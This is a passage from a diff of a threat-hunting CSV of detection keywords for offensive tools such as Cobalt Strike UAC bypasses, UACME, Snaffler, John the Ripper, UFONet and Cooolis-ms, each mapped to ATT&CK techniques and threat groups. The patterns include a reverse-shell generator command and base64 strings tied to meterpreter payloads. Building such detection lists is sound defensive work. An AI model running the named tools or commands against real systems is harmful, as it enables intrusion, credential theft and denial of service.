Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*uacm4gic*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*UACME-master*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*uac-schtasks *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*uac-schtasks*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*uac-silentcleanup*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*uac-silentcleanup*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*UACTokenManipulationManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*uaf2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*uaf2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*uberfile --lhost* --lport * --target-os * --downloader *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*udmp-parser-main*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" "*UDVC-Server.exe -c * -i 127.0.0.1*","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","3","242","54","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z" -"*UFONet*","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","1920","587","2022-11-28T17:28:29Z","2013-06-18T18:11:25Z" +"*UFONet*","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","1923","587","2022-11-28T17:28:29Z","2013-06-18T18:11:25Z" "*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" @@ -17911,9 +18095,9 @@ "*UlBDIFNlcnZlciBIb3N0*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UlBDIFNlcnZlciBQb3J0*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Ullaakut/Gorsair*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*UltraSnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" "*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit 